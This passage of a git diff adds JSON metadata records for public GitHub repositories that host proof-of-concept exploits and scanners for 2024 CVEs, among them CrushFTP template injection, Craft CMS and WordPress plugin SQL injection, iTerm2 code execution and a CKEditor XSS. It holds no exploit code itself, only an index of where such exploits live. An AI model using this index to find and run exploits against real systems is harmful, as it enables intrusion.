+ "full_name": "optistream\/securenvoy-cve-2024-37393",
+ "owner": {
+ "login": "optistream",
+ "id": 160848410,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160848410?v=4",
+ "html_url": "https:\/\/github.com\/optistream"
+ },
+ "html_url": "https:\/\/github.com\/optistream\/securenvoy-cve-2024-37393",
+ "description": "Vulnerability check script for CVE-2024-37393 (SecurEnvoy MFA 9.4.513)",
+ "fork": false,
+ "created_at": "2024-06-10T12:42:57Z",
+ "updated_at": "2024-06-20T02:01:22Z",
+ "pushed_at": "2024-06-10T13:43:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-37742.json b/2024/CVE-2024-37742.json
new file mode 100644
index 0000000000..571e746147
--- /dev/null
+++ b/2024/CVE-2024-37742.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 817975765,
+ "name": "CVE-2024-37742",
+ "full_name": "Eteblue\/CVE-2024-37742",
+ "owner": {
+ "login": "Eteblue",
+ "id": 151763816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151763816?v=4",
+ "html_url": "https:\/\/github.com\/Eteblue"
+ },
+ "html_url": "https:\/\/github.com\/Eteblue\/CVE-2024-37742",
+ "description": "This repository contains a PoC for exploiting CVE-2024-37742, a vulnerability in Safe Exam Browser (SEB) ≤ 3.5.0 on Windows. The vulnerability enables unauthorized clipboard data sharing between SEB's kiosk mode and the underlying system, compromising the integrity of exams.",
+ "fork": false,
+ "created_at": "2024-06-20T21:01:28Z",
+ "updated_at": "2024-06-24T08:36:55Z",
+ "pushed_at": "2024-06-23T00:16:38Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-37759.json b/2024/CVE-2024-37759.json
new file mode 100644
index 0000000000..8bc7597dd8
--- /dev/null
+++ b/2024/CVE-2024-37759.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 818063757,
+ "name": "CVE-2024-37759_PoC",
+ "full_name": "crumbledwall\/CVE-2024-37759_PoC",
+ "owner": {
+ "login": "crumbledwall",
+ "id": 44513103,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44513103?v=4",
+ "html_url": "https:\/\/github.com\/crumbledwall"
+ },
+ "html_url": "https:\/\/github.com\/crumbledwall\/CVE-2024-37759_PoC",
+ "description": "PoC of CVE-2024-37759",
+ "fork": false,
+ "created_at": "2024-06-21T02:58:40Z",
+ "updated_at": "2024-06-23T15:00:46Z",
+ "pushed_at": "2024-06-23T15:00:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-37791.json b/2024/CVE-2024-37791.json
new file mode 100644
index 0000000000..51796587de
--- /dev/null
+++ b/2024/CVE-2024-37791.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 817225951,
+ "name": "CVE-2024-37791",
+ "full_name": "czheisenberg\/CVE-2024-37791",
+ "owner": {
+ "login": "czheisenberg",
+ "id": 52897817,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52897817?v=4",
+ "html_url": "https:\/\/github.com\/czheisenberg"
+ },
+ "html_url": "https:\/\/github.com\/czheisenberg\/CVE-2024-37791",
+ "description": "我的CVE-2024-37791",
+ "fork": false,
+ "created_at": "2024-06-19T09:16:30Z",
+ "updated_at": "2024-06-19T10:01:09Z",
+ "pushed_at": "2024-06-19T10:01:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-37843.json b/2024/CVE-2024-37843.json
new file mode 100644
index 0000000000..7f8aaec75d
--- /dev/null
+++ b/2024/CVE-2024-37843.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 816569374,
+ "name": "CVE-2024-37843-POC",
+ "full_name": "gsmith257-cyber\/CVE-2024-37843-POC",
+ "owner": {
+ "login": "gsmith257-cyber",
+ "id": 55564824,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55564824?v=4",
+ "html_url": "https:\/\/github.com\/gsmith257-cyber"
+ },
+ "html_url": "https:\/\/github.com\/gsmith257-cyber\/CVE-2024-37843-POC",
+ "description": "POC for CVE-2024-37843. Craft CMS time-based blind SQLi",
+ "fork": false,
+ "created_at": "2024-06-18T02:27:04Z",
+ "updated_at": "2024-06-18T04:20:15Z",
+ "pushed_at": "2024-06-18T04:20:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-37888.json b/2024/CVE-2024-37888.json
new file mode 100644
index 0000000000..d34cf95a79
--- /dev/null
+++ b/2024/CVE-2024-37888.json
@@ -0,0 +1,49 @@
+[
+ {
+ "id": 812924226,
+ "name": "CVE-2024-37888",
+ "full_name": "7Ragnarok7\/CVE-2024-37888",
+ "owner": {
+ "login": "7Ragnarok7",
+ "id": 35977703,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35977703?v=4",
+ "html_url": "https:\/\/github.com\/7Ragnarok7"
+ },
+ "html_url": "https:\/\/github.com\/7Ragnarok7\/CVE-2024-37888",
+ "description": "XSS PoC\/Exploit for Open Link Plugin for CKEditor 4",
+ "fork": false,
+ "created_at": "2024-06-10T07:00:18Z",
+ "updated_at": "2024-06-24T10:50:25Z",
+ "pushed_at": "2024-06-20T08:40:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": true,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "7ragnarok7",
+ "ckeditor",
+ "cve",
+ "cve-2024-37888",
+ "cybersecurity",
+ "exploit",
+ "github",
+ "hack",
+ "hacking",
+ "openlink",
+ "opensource",
+ "poc",
+ "public",
+ "security",
+ "vulnerability",
+ "xss"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-37889.json b/2024/CVE-2024-37889.json
new file mode 100644
index 0000000000..f3dc11ef06
--- /dev/null
+++ b/2024/CVE-2024-37889.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 816119624,
+ "name": "CVE-2024-37889",
+ "full_name": "uname-s\/CVE-2024-37889",
+ "owner": {
+ "login": "uname-s",
+ "id": 94480739,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94480739?v=4",
+ "html_url": "https:\/\/github.com\/uname-s"
+ },
+ "html_url": "https:\/\/github.com\/uname-s\/CVE-2024-37889",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-17T04:50:00Z",
+ "updated_at": "2024-06-17T05:36:53Z",
+ "pushed_at": "2024-06-17T05:36:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3806.json b/2024/CVE-2024-3806.json
new file mode 100644
index 0000000000..6cb45e5efd
--- /dev/null
+++ b/2024/CVE-2024-3806.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 798859489,
+ "name": "CVE-2024-3806-AND-CVE-2024-3807-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-3806-AND-CVE-2024-3807-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3806-AND-CVE-2024-3807-Poc",
+ "description": "CVE-2024-3806: Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts CVE-2024-3807: Porto <= 7.1.0 - Authenticated (Contributor+) Local File Inclusion via Post Meta",
+ "fork": false,
+ "created_at": "2024-05-10T16:13:07Z",
+ "updated_at": "2024-05-25T14:29:56Z",
+ "pushed_at": "2024-05-10T17:58:19Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-38396.json b/2024/CVE-2024-38396.json
new file mode 100644
index 0000000000..a3edeaec60
--- /dev/null
+++ b/2024/CVE-2024-38396.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 815829677,
+ "name": "poc-cve-2024-38396",
+ "full_name": "vin01\/poc-cve-2024-38396",
+ "owner": {
+ "login": "vin01",
+ "id": 30344579,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30344579?v=4",
+ "html_url": "https:\/\/github.com\/vin01"
+ },
+ "html_url": "https:\/\/github.com\/vin01\/poc-cve-2024-38396",
+ "description": "PoC for iTerm2 CVEs CVE-2024-38396 and CVE-2024-38395 which allow code execution",
+ "fork": false,
+ "created_at": "2024-06-16T09:43:46Z",
+ "updated_at": "2024-06-25T07:14:19Z",
+ "pushed_at": "2024-06-16T09:51:05Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3867.json b/2024/CVE-2024-3867.json
new file mode 100644
index 0000000000..85a634984f
--- /dev/null
+++ b/2024/CVE-2024-3867.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 797589339,
+ "name": "CVE-2024-3867",
+ "full_name": "c4cnm\/CVE-2024-3867",
+ "owner": {
+ "login": "c4cnm",
+ "id": 166544186,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166544186?v=4",
+ "html_url": "https:\/\/github.com\/c4cnm"
+ },
+ "html_url": "https:\/\/github.com\/c4cnm\/CVE-2024-3867",
+ "description": "This repository shows u some information on this vulnerability, which were found by me.",
+ "fork": false,
+ "created_at": "2024-05-08T06:19:05Z",
+ "updated_at": "2024-05-08T06:33:08Z",
+ "pushed_at": "2024-05-08T06:33:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3922.json b/2024/CVE-2024-3922.json
new file mode 100644
index 0000000000..d372fdb7c5
--- /dev/null
+++ b/2024/CVE-2024-3922.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 814025007,
+ "name": "CVE-2024-3922-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-3922-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3922-Poc",
+ "description": "Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection",
+ "fork": false,
+ "created_at": "2024-06-12T07:42:10Z",
+ "updated_at": "2024-06-14T07:18:29Z",
+ "pushed_at": "2024-06-12T08:03:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4040.json b/2024/CVE-2024-4040.json
new file mode 100644
index 0000000000..9ea0207ec9
--- /dev/null
+++ b/2024/CVE-2024-4040.json
@@ -0,0 +1,317 @@
+[
+ {
+ "id": 790656600,
+ "name": "CVE-2024-4040",
+ "full_name": "airbus-cert\/CVE-2024-4040",
+ "owner": {
+ "login": "airbus-cert",
+ "id": 26453405,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26453405?v=4",
+ "html_url": "https:\/\/github.com\/airbus-cert"
+ },
+ "html_url": "https:\/\/github.com\/airbus-cert\/CVE-2024-4040",
+ "description": "Scanner for CVE-2024-4040",
+ "fork": false,
+ "created_at": "2024-04-23T09:31:29Z",
+ "updated_at": "2024-06-13T21:11:43Z",
+ "pushed_at": "2024-05-17T06:48:43Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 791624022,
+ "name": "CVE-2024-4040-Scanner",
+ "full_name": "tucommenceapousser\/CVE-2024-4040-Scanner",
+ "owner": {
+ "login": "tucommenceapousser",
+ "id": 129875733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4",
+ "html_url": "https:\/\/github.com\/tucommenceapousser"
+ },
+ "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2024-4040-Scanner",
+ "description": "Scanner of vulnerability on crushftp instance",
+ "fork": false,
+ "created_at": "2024-04-25T04:01:23Z",
+ "updated_at": "2024-05-19T22:49:33Z",
+ "pushed_at": "2024-04-25T04:31:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 791636172,
+ "name": "CVE-2024-4040",
+ "full_name": "rbih-boulanouar\/CVE-2024-4040",
+ "owner": {
+ "login": "rbih-boulanouar",
+ "id": 79673409,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79673409?v=4",
+ "html_url": "https:\/\/github.com\/rbih-boulanouar"
+ },
+ "html_url": "https:\/\/github.com\/rbih-boulanouar\/CVE-2024-4040",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-25T04:45:38Z",
+ "updated_at": "2024-06-13T21:16:12Z",
+ "pushed_at": "2024-04-25T04:56:50Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 791645744,
+ "name": "CVE-2024-4040",
+ "full_name": "Mufti22\/CVE-2024-4040",
+ "owner": {
+ "login": "Mufti22",
+ "id": 75854478,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75854478?v=4",
+ "html_url": "https:\/\/github.com\/Mufti22"
+ },
+ "html_url": "https:\/\/github.com\/Mufti22\/CVE-2024-4040",
+ "description": "A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.",
+ "fork": false,
+ "created_at": "2024-04-25T05:18:06Z",
+ "updated_at": "2024-06-21T00:12:21Z",
+ "pushed_at": "2024-04-25T05:21:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 792008958,
+ "name": "CVE-2024-4040-SSTI-LFI-PoC",
+ "full_name": "Stuub\/CVE-2024-4040-SSTI-LFI-PoC",
+ "owner": {
+ "login": "Stuub",
+ "id": 60468836,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4",
+ "html_url": "https:\/\/github.com\/Stuub"
+ },
+ "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-4040-SSTI-LFI-PoC",
+ "description": "CVE-2024-4040 CrushFTP SSTI LFI & Auth Bypass | Full Server Takeover | Wordlist Support",
+ "fork": false,
+ "created_at": "2024-04-25T19:51:38Z",
+ "updated_at": "2024-06-25T07:29:24Z",
+ "pushed_at": "2024-05-13T17:29:03Z",
+ "stargazers_count": 45,
+ "watchers_count": 45,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "arbitrary-file-read",
+ "crushftp",
+ "crushftp0day",
+ "cve",
+ "cve-2024-4040",
+ "cve-2024-4040-exploit",
+ "cve-2024-4040-poc",
+ "cve2024-4040",
+ "lfi",
+ "owasp",
+ "python",
+ "rce",
+ "sftp"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 45,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 793492567,
+ "name": "CVE-2024-4040-CrushFTP-server",
+ "full_name": "Praison001\/CVE-2024-4040-CrushFTP-server",
+ "owner": {
+ "login": "Praison001",
+ "id": 60835238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4",
+ "html_url": "https:\/\/github.com\/Praison001"
+ },
+ "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-4040-CrushFTP-server",
+ "description": "Exploit for CVE-2024-4040 affecting CrushFTP server in all versions before 10.7.1 and 11.1.0 on all platforms",
+ "fork": false,
+ "created_at": "2024-04-29T10:21:53Z",
+ "updated_at": "2024-04-29T10:27:07Z",
+ "pushed_at": "2024-04-29T10:27:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 794110110,
+ "name": "CVE-2024-4040",
+ "full_name": "Mohammaddvd\/CVE-2024-4040",
+ "owner": {
+ "login": "Mohammaddvd",
+ "id": 108727157,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108727157?v=4",
+ "html_url": "https:\/\/github.com\/Mohammaddvd"
+ },
+ "html_url": "https:\/\/github.com\/Mohammaddvd\/CVE-2024-4040",
+ "description": "Exploit CrushFTP CVE-2024-4040",
+ "fork": false,
+ "created_at": "2024-04-30T13:27:34Z",
+ "updated_at": "2024-05-13T03:54:08Z",
+ "pushed_at": "2024-04-30T13:36:33Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 794593495,
+ "name": "CVE-2024-4040-CrushFTP-File-Read-vulnerability",
+ "full_name": "jakabakos\/CVE-2024-4040-CrushFTP-File-Read-vulnerability",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-4040-CrushFTP-File-Read-vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-01T14:42:39Z",
+ "updated_at": "2024-06-06T11:58:36Z",
+ "pushed_at": "2024-05-02T09:58:21Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 795736659,
+ "name": "CVE-2024-4040",
+ "full_name": "gotr00t0day\/CVE-2024-4040",
+ "owner": {
+ "login": "gotr00t0day",
+ "id": 48636787,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48636787?v=4",
+ "html_url": "https:\/\/github.com\/gotr00t0day"
+ },
+ "html_url": "https:\/\/github.com\/gotr00t0day\/CVE-2024-4040",
+ "description": "A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.",
+ "fork": false,
+ "created_at": "2024-05-03T23:29:53Z",
+ "updated_at": "2024-06-07T14:00:51Z",
+ "pushed_at": "2024-05-04T00:05:16Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 800094876,
+ "name": "CVE-2024-4040",
+ "full_name": "1ncendium\/CVE-2024-4040",
+ "owner": {
+ "login": "1ncendium",
+ "id": 50025292,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50025292?v=4",
+ "html_url": "https:\/\/github.com\/1ncendium"
+ },
+ "html_url": "https:\/\/github.com\/1ncendium\/CVE-2024-4040",
+ "description": "A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server. ",
+ "fork": false,
+ "created_at": "2024-05-13T17:33:36Z",
+ "updated_at": "2024-05-13T17:33:41Z",
+ "pushed_at": "2024-05-13T17:33:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4231.json b/2024/CVE-2024-4231.json
new file mode 100644
index 0000000000..93bc955df0
--- /dev/null
+++ b/2024/CVE-2024-4231.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 816778703,
+ "name": "Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231",
+ "full_name": "Redfox-Secuirty\/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231",
+ "owner": {
+ "login": "Redfox-Secuirty",
+ "id": 173128884,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4",
+ "html_url": "https:\/\/github.com\/Redfox-Secuirty"
+ },
+ "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-18T11:43:23Z",
+ "updated_at": "2024-06-18T11:43:27Z",
+ "pushed_at": "2024-06-18T11:43:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4232.json b/2024/CVE-2024-4232.json
new file mode 100644
index 0000000000..bb074af030
--- /dev/null
+++ b/2024/CVE-2024-4232.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 816762824,
+ "name": "Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232",
+ "full_name": "Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232",
+ "owner": {
+ "login": "Redfox-Secuirty",
+ "id": 173128884,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4",
+ "html_url": "https:\/\/github.com\/Redfox-Secuirty"
+ },
+ "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-18T11:05:06Z",
+ "updated_at": "2024-06-18T11:05:10Z",
+ "pushed_at": "2024-06-18T11:05:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4295.json b/2024/CVE-2024-4295.json
new file mode 100644
index 0000000000..9f0fbf6240
--- /dev/null
+++ b/2024/CVE-2024-4295.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 810747489,
+ "name": "CVE-2024-4295-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-4295-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4295-Poc",
+ "description": "CVE-2024-4295 Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via hash",
+ "fork": false,
+ "created_at": "2024-06-05T09:29:20Z",
+ "updated_at": "2024-06-05T10:27:20Z",
+ "pushed_at": "2024-06-05T10:24:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815013929,
+ "name": "CVE-2024-4295-Poc",
+ "full_name": "cve-2024\/CVE-2024-4295-Poc",
+ "owner": {
+ "login": "cve-2024",
+ "id": 172750025,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4",
+ "html_url": "https:\/\/github.com\/cve-2024"
+ },
+ "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-4295-Poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-14T07:04:36Z",
+ "updated_at": "2024-06-14T07:06:24Z",
+ "pushed_at": "2024-06-14T07:06:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4323.json b/2024/CVE-2024-4323.json
new file mode 100644
index 0000000000..b055e198a8
--- /dev/null
+++ b/2024/CVE-2024-4323.json
@@ -0,0 +1,99 @@
+[
+ {
+ "id": 803353937,
+ "name": "CVE-2024-4323-Exploit-POC",
+ "full_name": "skilfoy\/CVE-2024-4323-Exploit-POC",
+ "owner": {
+ "login": "skilfoy",
+ "id": 20802814,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20802814?v=4",
+ "html_url": "https:\/\/github.com\/skilfoy"
+ },
+ "html_url": "https:\/\/github.com\/skilfoy\/CVE-2024-4323-Exploit-POC",
